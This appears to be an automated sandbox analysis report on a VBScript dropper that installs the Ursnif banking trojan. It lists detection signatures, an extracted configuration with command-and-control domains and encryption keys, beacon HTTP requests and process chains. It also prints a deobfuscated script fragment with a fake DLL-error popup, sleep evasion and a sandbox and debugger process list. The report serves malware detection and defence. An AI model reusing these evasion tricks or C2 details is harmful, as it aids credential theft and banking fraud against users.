Windows Analysis Report start[2021.09.09_15-26].vbs

Overview

General Information

Sample Name: start[2021.09.09_15-26].vbs
Analysis ID: 481181
MD5: 3959f76d91c30f3c14916f80a6c4cf23
SHA1: 2c918bff7f9073762308af3876777afc8507e3a8
SHA256: 1d02060d7493d25e46e7cdf76fc05aa6c80493f40db75d48700f1eb17431191d
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Found API chain indicative of debugger detection
Found evasive API chain (may stop execution after checking system information)
Deletes itself after installation
Writes registry values via WMI
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000017.00000003.577173150.0000000000B30000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: start[2021.09.09_15-26].vbs Virustotal: Detection: 10% Perma Link
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/ Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT Avira URL Cloud: Label: malware
Source: http://pop.bigbigpoppa.com/ Avira URL Cloud: Label: malware
Source: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c Avira URL Cloud: Label: malware
Source: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: pop.urlovedstuff.com Virustotal: Detection: 8% Perma Link
Source: atl.bigbigpoppa.com Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\fum.cpp ReversingLabs: Detection: 13%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 23_2_00C23276
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034AC85 FindFirstFileExW, 23_2_7034AC85

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49789 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: pop.urlovedstuff.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253 185.251.90.253
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
Source: global traffic HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 11:52:04 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000002.733066508.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d
Source: rundll32.exe, 00000017.00000003.651548557.00000000006CF000.00000004.00000001.sdmp String found in binary or memory: http://atl.bigbigpoppa.com/R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT
Source: rundll32.exe, 00000017.00000002.732610833.000000000066A000.00000004.00000020.sdmp String found in binary or memory: http://pop.bigbigpoppa.com/
Source: rundll32.exe, 00000017.00000003.652840050.00000000006D5000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000003.697690406.00000000006D5000.00000004.00000001.sdmp String found in binary or memory: http://pop.urlovedstuff.com/FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5c
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /R4Q64ljn5F0AeB0LyB/NuqzcVKz_/2FKpDeUm0fBCI1AQABSO/SrwJzbiGX2y5piswKvk/JCT7aFfMHddlV3_2FIkW8P/ayLC_2Bshelva/2X_2Bg56/7jrpWKChL2MGyrBCg5dLHkp/afoZMxsy1T/Wp7_2FPeXCx8Q_2BZ/qOUTFrHwatL_/2B9CZYfq_2B/hvctvVLoqJu_2B/vpIx1k_2FVAj6zT_2F3t3/6fHnbpgCWlIc40kF/GNgoS4_2BmIaDcC/8SXP0dHgwB95tBuoyP/x_2BcO7Jg/2OPTdoZOpI7RlGA8Y18Y/JYFZfFiYFwCa3nBrqzw/H_2B8_2FkkexIGmoFzmcpf/7smS06LtDXKEe/c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /FYLjL0FWG/A8A_2FylIs_2BN6G7XZV/uXdtwH9ZjhHPJVfO4Ke/_2B2DA3Bxr3hT97jg6X5cf/HmT9c0wd9uTFE/mjIXEmZg/7w1x_2BJ7UrOUMBuwkzmQs_/2B_2B90mhB/GdhMF2xI5ZZQZOsRZ/w8ERaF_2FKjr/oJe_2BmPqxj/UioALST3UPW_2B/x25T0SA4ncGBrSmoWvhyD/GJA93v_2Bs5_2FOu/bRGYPwsER1HateV/PYXudbMJvsQ83oCtuH/3_2FsJC5W/WltZ3WhV77sZrxWGfR6s/bNzIeDiXMV8LnHFQlB1/BK37js8oH2L1YJRuiB3U5s/fOdLI1WLm_2Bt/WCukq3AFEXzr/kh2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: pop.urlovedstuff.com
Source: global traffic HTTP traffic detected: GET /0su8VV6_2B3_2B/puf6UG3h9deC_2Ft6TxKM/_2FYbenbgPpDMagU/M3qvcdiaQn_2FfY/O5d7t6b51CsWR3vpDy/zU3pR9vjY/lPgvi3S86qplQEaQf_2B/jxDYlqt8BjtcOWY_2FN/ohwhXl17Lh66734_2Fqn_2/FgCM3Tnuck0nF/J0S1YKxS/oTav10uGKUAnWla7FsZqe_2/BIXpQqvfaR/nMso0hdyU8dnVmjyD/LLoIt20KVY7z/9GJ5tvt7Ozs/NXB1gCveQulFzL/ZrjIdUFvH1uWGi_2BuvX_/2BGZEq0uPSkXlrhP/QwzrBUc1U9Q1ZY4/HzIgE26R/E HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C23276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 23_2_00C23276

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332274 23_2_70332274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C2725F 23_2_00C2725F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C27E30 23_2_00C27E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C21754 23_2_00C21754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7033F000 23_2_7033F000
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70348AA5 23_2_70348AA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70354362 23_2_70354362
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034D536 23_2_7034D536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7033F500 23_2_7033F500
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70350770 23_2_70350770
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331382 GetProcAddress,NtCreateSection,memset, 23_2_70331382
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703314FE SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 23_2_703314FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331B4A NtMapViewOfSection, 23_2_70331B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332495 NtQueryVirtualMemory, 23_2_70332495
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C240DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 23_2_00C240DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C28055 NtQueryVirtualMemory, 23_2_00C28055
Java / VBScript file with very long strings (likely obfuscated code)
Source: start[2021.09.09_15-26].vbs Initial sample: Strings found which are bigger than 50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\fum.cpp 8C5BA29FBEEDF62234916D84F3A857A3B086871631FD87FABDFC0818CF049587
Source: start[2021.09.09_15-26].vbs Virustotal: Detection: 10%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@7/2@4/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C22102 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 23_2_00C22102
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[2021.09.09_15-26].vbs'
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: start[2021.09.09_15-26].vbs Static file information: File size 1393062 > 1048576
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.555373535.00000262C5114000.00000004.00000001.sdmp, rundll32.exe, 00000017.00000002.735989389.0000000070374000.00000002.00020000.sdmp, fum.cpp.0.dr

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332210 push ecx; ret 23_2_70332219
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70332263 push ecx; ret 23_2_70332273
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C27AB0 push ecx; ret 23_2_00C27AB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C27E1F push ecx; ret 23_2_00C27E2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70357A3C push ds; iretd 23_2_70357A42
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7035922C push edi; ret 23_2_7035922E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70354A03 push ds; retf 0000h 23_2_70354A05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703562A0 push es; ret 23_2_703562B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70359301 push ebp; ret 23_2_70359304
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70356B54 pushfd ; iretd 23_2_70356B55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70357CF3 push ecx; retf 23_2_70357CF4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7035856E push ebp; retf 23_2_7035856F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70349D56 push esp; retf 23_2_70349D57
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70349758 push esp; retf 23_2_70349760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038FF41 push ss; ret 23_2_7038FF5B
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress, 23_2_70331A0A

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file
Drops PE files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\fum.cpp Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
